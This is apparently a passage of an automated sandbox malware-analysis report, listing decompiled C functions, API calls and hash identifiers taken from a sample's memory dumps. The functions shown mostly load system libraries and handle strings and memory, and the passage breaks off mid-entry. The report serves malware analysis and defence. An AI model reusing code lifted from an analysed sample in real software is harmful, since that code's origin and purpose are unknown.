                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileNameOpenwcscpy
                                                                                                                • String ID: L
                                                                                                                • API String ID: 3246554996-2909332022
                                                                                                                • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                				void* __esi;
                                                                                                                				_Unknown_base(*)()* _t10;
                                                                                                                				void* _t12;
                                                                                                                				struct HINSTANCE__** _t13;
                                                                                                                
                                                                                                                				_t13 = __eax;
                                                                                                                				_t12 = 0;
                                                                                                                				if(E00408F72(__eax) != 0) {
                                                                                                                					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                                                                					if(_t10 != 0) {
                                                                                                                						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t12;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: LookupAccountSidW$Y@
                                                                                                                • API String ID: 190572456-2352570548
                                                                                                                • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040AD85(intOrPtr _a4) {
                                                                                                                				_Unknown_base(*)()* _t3;
                                                                                                                				void* _t7;
                                                                                                                				struct HINSTANCE__* _t8;
                                                                                                                				char** _t9;
                                                                                                                
                                                                                                                				_t7 = 0;
                                                                                                                				_t8 = E00405436(L"shlwapi.dll");
                                                                                                                				 *_t9 = "SHAutoComplete";
                                                                                                                				_t3 = GetProcAddress(_t8, ??);
                                                                                                                				if(_t3 != 0) {
                                                                                                                					_t7 =  *_t3(_a4, 0x10000001);
                                                                                                                				}
                                                                                                                				FreeLibrary(_t8);
                                                                                                                				return _t7;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                • String ID: shlwapi.dll
                                                                                                                • API String ID: 4092907564-3792422438
                                                                                                                • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00406597(wchar_t* __esi) {
                                                                                                                				wchar_t* _t2;
                                                                                                                				wchar_t* _t6;
                                                                                                                
                                                                                                                				_t6 = __esi;
                                                                                                                				E00404AD9(__esi);
                                                                                                                				_t2 = wcsrchr(__esi, 0x2e);
                                                                                                                				if(_t2 != 0) {
                                                                                                                					 *_t2 =  *_t2 & 0x00000000;
                                                                                                                				}
                                                                                                                				return wcscat(_t6, L"_lng.ini");
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                • wcscat.MSVCRT ref: 004065B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AC52() {
                                                                                                                				struct HINSTANCE__* _t1;
                                                                                                                				_Unknown_base(*)()* _t2;
                                                                                                                
                                                                                                                				if( *0x4101c4 == 0) {
                                                                                                                					_t1 = E00405436(L"shell32.dll");
                                                                                                                					 *0x4101c4 = _t1;
                                                                                                                					if(_t1 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                                                						 *0x4101c0 = _t2;
                                                                                                                						return _t2;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t1;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                • API String ID: 946536540-880857682
                                                                                                                • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00406670(char** __esi, void* __eflags) {
                                                                                                                				char* _t30;
                                                                                                                				char** _t39;
                                                                                                                
                                                                                                                				_t39 = __esi;
                                                                                                                				 *__esi = "cf@";
                                                                                                                				__esi[0xb8] = 0;
                                                                                                                				_t30 = E00404FA4(0x338, __esi);
                                                                                                                				_push(0x14);
                                                                                                                				__esi[0xcb] = 0;
                                                                                                                				__esi[0xa6] = 0;
                                                                                                                				__esi[0xb9] = 0;
                                                                                                                				__esi[0xba] = 0xfff;
                                                                                                                				__esi[8] = 0;
                                                                                                                				__esi[1] = 0;
                                                                                                                				__esi[0xb7] = 1;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[2] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[3] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_push(0x14);
                                                                                                                				_t39[4] = _t30;
                                                                                                                				L0040B26C();
                                                                                                                				if(_t30 == 0) {
                                                                                                                					_t30 = 0;
                                                                                                                				} else {
                                                                                                                					_t30[4] = 0;
                                                                                                                					_t30[0x10] = 0;
                                                                                                                					_t30[8] = 0;
                                                                                                                					_t30[0xc] = 0x100;
                                                                                                                					 *_t30 = 0;
                                                                                                                				}
                                                                                                                				_t39[5] = _t30;
                                                                                                                				return _t39;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                                                				int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* __edi;
                                                                                                                				int _t32;
                                                                                                                				intOrPtr _t33;
                                                                                                                				intOrPtr _t36;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t58;
                                                                                                                				signed int _t59;
                                                                                                                				void** _t62;
                                                                                                                				void** _t63;
                                                                                                                				signed int* _t66;
                                                                                                                
                                                                                                                				_t66 = __eax;
                                                                                                                				_t32 = wcslen(_a4);
                                                                                                                				_t48 =  *(_t66 + 4);
                                                                                                                				_t58 = _t48 + _t32;
                                                                                                                				_v12 = _t58;
                                                                                                                				_t59 = _t58 + 1;
                                                                                                                				_v8 = _t32;
                                                                                                                				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                                                				 *(_t66 + 4) = _t59;
                                                                                                                				_t62 = _t66 + 0x10;
                                                                                                                				if(_t59 != 0xffffffff) {
                                                                                                                					E00404951(_t66, _t59, _t62, 2, _t33);
                                                                                                                				} else {
                                                                                                                					free( *_t62);
                                                                                                                				}
                                                                                                                				_t60 =  *(_t66 + 0x1c);
                                                                                                                				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                				_t63 = _t66 + 0xc;
                                                                                                                				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                                                					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                                                				} else {
                                                                                                                					free( *_t63);
                                                                                                                				}
                                                                                                                				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                                                				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                                                				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                                                				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                                                				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                                                				return _t30;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 004054EC
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                  • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                  • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                  • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                • memcpy.MSVCRT ref: 00405556
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 726966127-0
                                                                                                                • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00405ADF() {
                                                                                                                				void* _t25;
                                                                                                                				signed int _t27;
                                                                                                                				signed int _t29;
                                                                                                                				signed int _t31;
                                                                                                                				signed int _t33;
                                                                                                                				signed int _t50;
                                                                                                                				signed int _t52;
                                                                                                                				signed int _t54;
                                                                                                                				signed int _t56;
                                                                                                                				intOrPtr _t60;
                                                                                                                
                                                                                                                				_t60 =  *0x41c470;
                                                                                                                				if(_t60 == 0) {
                                                                                                                					_t50 = 2;
                                                                                                                					 *0x41c470 = 0x8000;
                                                                                                                					_t27 = 0x8000 * _t50;
                                                                                                                					 *0x41c474 = 0x100;
                                                                                                                					 *0x41c478 = 0x1000;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c458 = _t27;
                                                                                                                					_t52 = 4;
                                                                                                                					_t29 =  *0x41c474 * _t52;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c460 = _t29;
                                                                                                                					_t54 = 4;
                                                                                                                					_t31 =  *0x41c474 * _t54;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c464 = _t31;
                                                                                                                					_t56 = 2;
                                                                                                                					_t33 =  *0x41c478 * _t56;
                                                                                                                					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                                                                					L0040B26C();
                                                                                                                					 *0x41c45c = _t33;
                                                                                                                					return _t33;
                                                                                                                				}
                                                                                                                				return _t25;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1033339047-0
                                                                                                                • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Executed Functions

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.934317241.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                • Opcode ID: 6b797cea98825fb7292b33a7a85a673874eb98fd7e581077972fab7380befd63
                                                                                                                • Instruction ID: 581b3e46ce0880fd7d8d430d7d88841a75e638d838f14a95b18187c28a604ae4
                                                                                                                • Opcode Fuzzy Hash: 6b797cea98825fb7292b33a7a85a673874eb98fd7e581077972fab7380befd63
                                                                                                                • Instruction Fuzzy Hash: E4927074B002189FDB14DF74C8506AEB7B2AF88304F1485AAD90AAB351DF759E86CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.932569349.00000000033C0000.00000040.00000001.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 20e0ec4f530035f92b1b0361caa58bfae66ca1d5f84e1c0ea29234bd2eedbb41
                                                                                                                • Instruction ID: f76cffceb10ef57d9bd87107c5633c5e705ea518485257e2daae85f8bb4d14d4
                                                                                                                • Opcode Fuzzy Hash: 20e0ec4f530035f92b1b0361caa58bfae66ca1d5f84e1c0ea29234bd2eedbb41
                                                                                                                • Instruction Fuzzy Hash: DDF22874710644CFCB24DF28C8D8A69BBB6BF89314F19899DE9568B362CB31EC45CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.932569349.00000000033C0000.00000040.00000001.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9cdaefda7f0b0915bf5ecdeb837a2c27fe05280c4be2bc1aa85221b46921a5db
                                                                                                                • Instruction ID: 6033da3d67d70b6d1bfaf1204439721603a50e9e738286c3586180a06d7f4aee
                                                                                                                • Opcode Fuzzy Hash: 9cdaefda7f0b0915bf5ecdeb837a2c27fe05280c4be2bc1aa85221b46921a5db
                                                                                                                • Instruction Fuzzy Hash: 0BE24874B106449FCB28DF68C8D8AADB7F2BF89314B15899CE4169B762CB31EC45CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.932569349.00000000033C0000.00000040.00000001.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 12cd8346b722f3b18f4b86d74b5ebeb593d2d74c92e80263fc0815056cf9df9b
                                                                                                                • Instruction ID: c7076615ad1adfd265823b46bd19bbc7abcaf4c2bff6cab792affa8b559fbc91
                                                                                                                • Opcode Fuzzy Hash: 12cd8346b722f3b18f4b86d74b5ebeb593d2d74c92e80263fc0815056cf9df9b
                                                                                                                • Instruction Fuzzy Hash: 69521B78A10218CFCB18EF64C894AADB7B6FF88314F158469E816AB365CB35EC41CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.932569349.00000000033C0000.00000040.00000001.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8f9e729fa75fc39b0ebd843d4b6db405d31c8957e4daf98b09142a0a3d61b1b7
                                                                                                                • Instruction ID: 94961e9a5fb35cd629176be3baa3c72537b88abfd644440435848f129cf93883
                                                                                                                • Opcode Fuzzy Hash: 8f9e729fa75fc39b0ebd843d4b6db405d31c8957e4daf98b09142a0a3d61b1b7
                                                                                                                • Instruction Fuzzy Hash: 094247787106448FCB24DF28C8D8A6ABBF6FF88314B158998E516DB362DB35EC45CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04E05738
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.937030708.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: c8fb7d6af71f61d2073f052227a1cca30f137230989af3db0f22e0850fdbc311
                                                                                                                • Instruction ID: 0bb7a90fc4f8070dd71288a1b479e62abf0c2cfd17ce0e538318bfffeccb06e4
                                                                                                                • Opcode Fuzzy Hash: c8fb7d6af71f61d2073f052227a1cca30f137230989af3db0f22e0850fdbc311
                                                                                                                • Instruction Fuzzy Hash: 541124B1D006199BDB10CFAAD8456EEFBB4FF08324F14811AD829B3640D738A945CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 04E05738
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.937030708.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: c53ed2ee1b40b3f98a35a77dee5215b1c79f7907d819b44d189578cdf1c7966c
                                                                                                                • Instruction ID: f8d0cded849623c416796e3fcf3387b13ef5dc182b31dbc4b221c302a3d12d13
                                                                                                                • Opcode Fuzzy Hash: c53ed2ee1b40b3f98a35a77dee5215b1c79f7907d819b44d189578cdf1c7966c
                                                                                                                • Instruction Fuzzy Hash: 9A2124B1D006199BCB10CF9AD845B9EFBB4FB48324F14811AD819B3740D778A944CFE5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.934317241.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: C&
                                                                                                                • API String ID: 0-3983019431
                                                                                                                • Opcode ID: f6026ed7ae412944642d182159461ec43e57e6b7fce30a46916134b583856c5c
                                                                                                                • Instruction ID: a9f4b933815012bae961c4ea1a2e64c301014ddd08c5d47fbd4c4ec54afe3415
                                                                                                                • Opcode Fuzzy Hash: f6026ed7ae412944642d182159461ec43e57e6b7fce30a46916134b583856c5c
                                                                                                                • Instruction Fuzzy Hash: C221D235200344AFC314DF25D480997BBA7EF862587158AAED4198F792DB36FC4ACBD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.934317241.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: C&
                                                                                                                • API String ID: 0-3983019431
                                                                                                                • Opcode ID: 87ca969ee79abc420d68eb187ceef1ccf55dcb7befebd39f97c5d783a439206d
                                                                                                                • Instruction ID: 9ee51e3ea1544a58b2d44ad1f270de571c9f561e33c82506c67b617800a9f10b
                                                                                                                • Opcode Fuzzy Hash: 87ca969ee79abc420d68eb187ceef1ccf55dcb7befebd39f97c5d783a439206d
                                                                                                                • Instruction Fuzzy Hash: D211A0312007049BC308EF26D481997BBA7EBC52187158A7ED4298F795DB36FC06CBD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.934317241.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dfc40888b8eb590c7e75f55b2e39110ebd0a96dd1835e4efe3847a2fe3956226
                                                                                                                • Instruction ID: d596556277ceca4cb3002170224b0b059a52fe288fe04bf698dac454e11f411e
                                                                                                                • Opcode Fuzzy Hash: dfc40888b8eb590c7e75f55b2e39110ebd0a96dd1835e4efe3847a2fe3956226
                                                                                                                • Instruction Fuzzy Hash: C03150303001208B8B29DF65925883E77BBEBC8646316401EE40BCB357DF75EC02DB46
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.932569349.00000000033C0000.00000040.00000001.sdmp, Offset: 033C0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bf4709f503db637f46267db272ed04b1c6f90f2f81374345da60eed9b8a8e389
                                                                                                                • Instruction ID: 4d22f8b4c90ac8b9a266e0bed3561e4ab310ee9c65c635fa6cfc5e132acab0da
